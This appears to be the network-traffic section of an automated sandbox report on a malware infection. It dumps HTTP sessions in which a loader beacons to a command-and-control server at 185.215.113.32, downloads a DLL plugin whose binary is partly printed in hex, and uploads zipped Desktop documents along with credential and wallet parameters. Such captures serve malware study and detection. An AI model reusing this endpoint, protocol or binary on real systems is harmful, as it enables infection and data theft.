                                                                                            2192.168.2.449738185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:04.027621984 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:04.273019075 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:04.273906946 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:04.524101019 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.449739185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:04.862179995 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:05.097872972 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:04 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:05.098712921 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:05.340343952 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.449740185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:05.699803114 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:05.945846081 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:05 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:05.946607113 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:06.196755886 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.449741185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:05.956392050 CET65OUTGET /yandex/Plugins/clip64.dll HTTP/1.1
                                                                                            Host: 185.215.113.32
                                                                                            Mar 28, 2024 20:03:06.202734947 CET1286INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:06 GMT
                                                                                            Content-Type: application/octet-stream
                                                                                            Content-Length: 112128
                                                                                            Last-Modified: Sun, 04 Feb 2024 16:00:18 GMT
                                                                                            Connection: keep-alive
                                                                                            ETag: "65bfb492-1b600"
                                                                                            Accept-Ranges: bytes
                                                                                            Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 10 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 27 f6 04 b3 63 97 6a e0 63 97 6a e0 63 97 6a e0 38 ff 69 e1 69 97 6a e0 38 ff 6f e1 eb 97 6a e0 38 ff 6e e1 71 97 6a e0 b6 fa 6e e1 6c 97 6a e0 b6 fa 69 e1 72 97 6a e0 b6 fa 6f e1 42 97 6a e0 38 ff 6b e1 64 97 6a e0 63 97 6b e0 02 97 6a e0 f8 f9 63 e1 60 97 6a e0 f8 f9 6a e1 62 97 6a e0 f8 f9 95 e0 62 97 6a e0 f8 f9 68 e1 62 97 6a e0 52 69 63 68 63 97 6a e0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 b2 bf 65 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 18 00 24 01 00 00 9a 00 00 00 00 00 00 4c 66 00 00 00 10 00 00 00 40 01 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 02 00 00 04 00 00 00 00 00 00 02 00 40 01 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 20 a0 01 00 9c 00 00 00 bc a0 01 00 50 00 00 00 00 d0 01 00 f8 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 01 00 bc 14 00 00 f0 8e 01 00 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 8f 01 00 40 00 00 00 00 00 00 00 00 00 00 00 00 40 01 00 4c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 96 22 01 00 00 10 00 00 00 24 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 34 68 00 00 00 40 01 00 00 6a 00 00 00 28 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 1c 17 00 00 00 b0 01 00 00 0c 00 00 00 92 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 f8 00 00 00 00 d0 01 00 00 02 00 00 00 9e 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 bc 14 00 00 00 e0 01 00 00 16 00 00 00 a0 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                            Data Ascii: MZ@!L!This program cannot be run in DOS mode.$'cjcjcj8iij8oj8nqjnljirjoBj8kdjckjc`jjbjbjhbjRichcjPELe!$Lf@@ P8(@@L.text"$ `.rdata4h@j(@@.data@.rsrc@@.reloc@B
                                                                                            Mar 28, 2024 20:03:06.202800035 CET1286INData Raw: 00 00 00 00 00 6a 20 68 08 8d 01 10 b9 60 b8 01 10 e8 6f 43 00 00 68 40 2c 01 10 e8 dd 50 00 00 59 c3 cc cc cc 6a 20 68 2c 8d 01 10 b9 78 b8 01 10 e8 4f 43 00 00 68 a0 2c 01 10 e8 bd 50 00 00 59 c3 cc cc cc 6a 14 68 50 8d 01 10 b9 90 b8 01 10 e8
                                                                                            Data Ascii: j h`oCh@,PYj h,xOCh,PYjhP/Ch-PYjhhCh`-}PYjhBh-]PYjhBh .=PYjhBh.PYjh
                                                                                            Mar 28, 2024 20:03:06.202817917 CET1286INData Raw: ff ff 8d 8d 88 fb ff ff 50 c7 85 9c fb ff ff 0f 00 00 00 c6 85 88 fb ff ff 00 e8 60 3e 00 00 c6 45 fc 06 8d b5 88 fb ff ff 83 bd 9c fb ff ff 10 8b bd 88 fb ff ff 8b 95 e8 fb ff ff 0f 43 f7 8b 85 ec fb ff ff 8b 8d 98 fb ff ff 2b c2 89 b5 b0 fb ff
                                                                                            Data Ascii: P`>EC+Q;wCCPs VQCEr+Hr#+QW
                                                                                            Mar 28, 2024 20:03:06.202840090 CET1286INData Raw: 64 b9 01 10 83 f9 10 72 2e a1 50 b9 01 10 41 81 f9 00 10 00 00 72 16 8b 50 fc 83 c1 23 2b c2 83 c0 fc 83 f8 1f 0f 87 ef 00 00 00 8b c2 51 50 e8 57 43 00 00 83 c4 08 c7 05 60 b9 01 10 00 00 00 00 c7 05 64 b9 01 10 0f 00 00 00 c6 05 50 b9 01 10 00
                                                                                            Data Ascii: dr.PArP#+QPWC`dPP~Ff`FFUr(MBrI#+wzRQBEUEEEr(MBrI#+w1RQB
                                                                                            Mar 28, 2024 20:03:06.202855110 CET1286INData Raw: c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00 c7 45 fc 00 00 00 00 0f 57 c0 66 0f d6 45 e4 c7 45 ec 00 00 00 00 68 00 04 00 00 c7 45 d0 01 00 00 00 c7 45 e4 00 00 00 00 c7 45 e8 00 00 00 00 c7 45 ec 00 00 00 00 e8 69 3e 00 00 8b f8 b9 00 01
                                                                                            Data Ascii: FFEWfEEhEEEEi>}UUE3EB@|E3M3U_9PvxErEt\xFNU;Ns~AFrD
                                                                                            Mar 28, 2024 20:03:06.202887058 CET1286INData Raw: 18 8b c8 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 89 4d cc c6 06 00 bb 01 00 00 00 33 ff 89 5d d0 85 c9 0f 8e e4 00 00 00 0f 1f 40 00 c7 45 e4 00 00 00 00 c7 45 e8 0f 00 00 00 c6 45 d4 00 3b c7 0f 82 14 01 00 00 2b c7 b9 02 00 00 00 3b c1 0f 42
                                                                                            Data Ascii: FFM3]@EEE;+;B}ECEQMP/]EE}jCEjPuNV];sAFrDuEuQ1EUr(MBrI#+wpRQ
                                                                                            Mar 28, 2024 20:03:06.202918053 CET1286INData Raw: 33 c5 89 45 f0 56 57 50 8d 45 f4 64 a3 00 00 00 00 c7 45 fc 00 00 00 00 8d 4d c0 6a 24 68 48 8e 01 10 c7 45 d0 00 00 00 00 c7 45 d4 0f 00 00 00 c6 45 c0 00 e8 2e 2a 00 00 c6 45 fc 01 8b 45 18 85 c0 75 07 33 f6 e9 dc 00 00 00 33 ff 85 c0 0f 84 cd
                                                                                            Data Ascii: 3EVWPEdEMj$hHEEE.*EEu33fEEE;u+;B}ECEQMP)EEeP'EEP'E0EUr,MB
                                                                                            Mar 28, 2024 20:03:06.202989101 CET1286INData Raw: c4 08 56 ff 15 08 40 01 10 ff 15 20 41 01 10 8b c7 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 8b e5 5d c3 e8 4a 68 00 00 cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 80 2a 01 10 64 a1 00 00 00 00 50 83 ec 40 a1 08 b0 01 10 33 c5 89 45 f0 56 50 8d
                                                                                            Data Ascii: V@ AMdY_^]JhUjh*dP@3EVPEdEejhpAA$EE eP"EEP"ME(0EEeP"EjhxAAm$
                                                                                            Mar 28, 2024 20:03:06.203123093 CET1286INData Raw: 94 b9 01 10 0f 00 00 00 c6 05 80 b9 01 10 00 0f 10 06 0f 11 05 80 b9 01 10 f3 0f 7e 46 10 66 0f d6 05 90 b9 01 10 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00 8b 55 cc 83 fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2
                                                                                            Data Ascii: ~FfFFUr,MBrI#+RQ*uEePEjhAAE0EEEHE;0+;B}ECEMVPl
                                                                                            Mar 28, 2024 20:03:06.203138113 CET1286INData Raw: 00 00 c7 41 14 0f 00 00 00 c6 01 00 e8 44 1b 00 00 c6 45 fc 04 e8 3b ed ff ff 83 c4 30 c7 45 c8 00 00 00 00 c7 45 cc 0f 00 00 00 c6 45 b8 00 8d 48 ff b8 b0 b9 01 10 39 0d c0 b9 01 10 0f 42 0d c0 b9 01 10 83 3d c4 b9 01 10 10 51 0f 43 05 b0 b9 01
                                                                                            Data Ascii: ADE;0EEEH9B=QCMPr.ArP#+wQP$EU~EMfAA9B=RCPeM
                                                                                            Mar 28, 2024 20:03:06.449323893 CET1286INData Raw: 10 66 0f d6 05 d8 b9 01 10 c7 46 10 00 00 00 00 c7 46 14 0f 00 00 00 c6 06 00 8b 55 cc 83 fa 10 72 2c 8b 4d b8 42 8b c1 81 fa 00 10 00 00 72 14 8b 49 fc 83 c2 23 2b c1 83 c0 fc 83 f8 1f 0f 87 d4 08 00 00 52 51 e8 16 20 00 00 83 c4 08 83 ec 18 8b
                                                                                            Data Ascii: fFFUr,MBrI#+RQ ehxEhME0t|r.ArP#+dQP~Ff


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.449742185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:06.559937000 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:06.806591988 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:06.807462931 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:07.057037115 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            7192.168.2.449743185.215.113.32808088C:\Windows\System32\rundll32.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:06.745507002 CET172OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 21
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 69 64 3d 32 34 36 31 32 32 36 35 38 33 36 39 26 63 72 65 64 3d
                                                                                            Data Ascii: id=246122658369&cred=
                                                                                            Mar 28, 2024 20:03:06.992780924 CET219INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:06 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Refresh: 0; url = Login.php
                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 1 0
                                                                                            Mar 28, 2024 20:03:13.329159021 CET168OUTPOST /yandex/index.php?wal=1 HTTP/1.1
                                                                                            Content-Type: multipart/form-data; boundary=----NjE0NQ==
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 6305
                                                                                            Cache-Control: no-cache
                                                                                            Mar 28, 2024 20:03:13.329262018 CET140OUTData Raw: 2d 2d 2d 2d 2d 2d 4e 6a 45 30 4e 51 3d 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36
                                                                                            Data Ascii: ------NjE0NQ==Content-Disposition: form-data; name="data"; filename="246122658369_Desktop.zip"Content-Type: application/octet-stream
                                                                                            Mar 28, 2024 20:03:13.329328060 CET8OUTData Raw: 50 4b 03 04 14 00 00 00
                                                                                            Data Ascii: PK
                                                                                            Mar 28, 2024 20:03:13.329360008 CET8OUTData Raw: 08 00 4f 70 44 57 53 c6
                                                                                            Data Ascii: OpDWS
                                                                                            Mar 28, 2024 20:03:13.329385042 CET8OUTData Raw: ff da 84 02 00 00 02 04
                                                                                            Data Ascii:
                                                                                            Mar 28, 2024 20:03:13.329426050 CET8OUTData Raw: 00 00 17 00 00 00 5f 46
                                                                                            Data Ascii: _F
                                                                                            Mar 28, 2024 20:03:13.329449892 CET8OUTData Raw: 69 6c 65 73 5f 5c 41 49
                                                                                            Data Ascii: iles_\AI
                                                                                            Mar 28, 2024 20:03:13.329488993 CET8OUTData Raw: 58 41 43 56 59 42 53 42
                                                                                            Data Ascii: XACVYBSB
                                                                                            Mar 28, 2024 20:03:13.329488993 CET8OUTData Raw: 2e 64 6f 63 78 15 93 47
                                                                                            Data Ascii: .docxG
                                                                                            Mar 28, 2024 20:03:13.329519987 CET8OUTData Raw: 6e 40 31 08 44 f7 91 72
                                                                                            Data Ascii: n@1Dr
                                                                                            Mar 28, 2024 20:03:13.329555035 CET8OUTData Raw: 28 17 dc 0b c6 c6 85 fb
                                                                                            Data Ascii: (
                                                                                            Mar 28, 2024 20:03:13.607911110 CET190INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:13 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 1 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            8192.168.2.449744185.215.113.32807888C:\Users\user\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:07.416982889 CET154OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 4
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 73 74 3d 73
                                                                                            Data Ascii: st=s
                                                                                            Mar 28, 2024 20:03:07.655338049 CET197INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 38 0d 0a 20 3c 63 3e 33 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 8 <c>3<d>0
                                                                                            Mar 28, 2024 20:03:07.656796932 CET306OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 154
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 39 38 36 42 34 45 46 41 38 42 36 39 44 32 37 39 31 34 32 34 41 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 46 42 30 32 37 37 37 42 32 35 45 38 32 44 31 32 46 43 38 36 30 42 33 33 37 41 45 36 34 46 37 31 46 34 36 32 41 45 34 37 38 32 32 32 46 46 44 45 44 30 46 38 45 31 46 39 33 39 46
                                                                                            Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58986B4EFA8B69D2791424AB140BE1D46450FC9DDF642E3BDD70A7FB02777B25E82D12FC860B337AE64F71F462AE478222FFDED0F8E1F939F
                                                                                            Mar 28, 2024 20:03:07.898365021 CET196INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
                                                                                            Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                                                            Data Ascii: 7 <c><d>0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            9192.168.2.449745185.215.113.32805812C:\Windows\SysWOW64\rundll32.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Mar 28, 2024 20:03:07.459173918 CET155OUTPOST /yandex/index.php HTTP/1.1
                                                                                            Content-Type: application/x-www-form-urlencoded
                                                                                            Host: 185.215.113.32
                                                                                            Content-Length: 5
                                                                                            Cache-Control: no-cache
                                                                                            Data Raw: 77 6c 74 3d 31
                                                                                            Data Ascii: wlt=1
                                                                                            Mar 28, 2024 20:03:07.695763111 CET737INHTTP/1.1 200 OK
                                                                                            Server: nginx/1.18.0 (Ubuntu)
                                                                                            Date: Thu, 28 Mar 2024 19:03:07 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: keep-alive
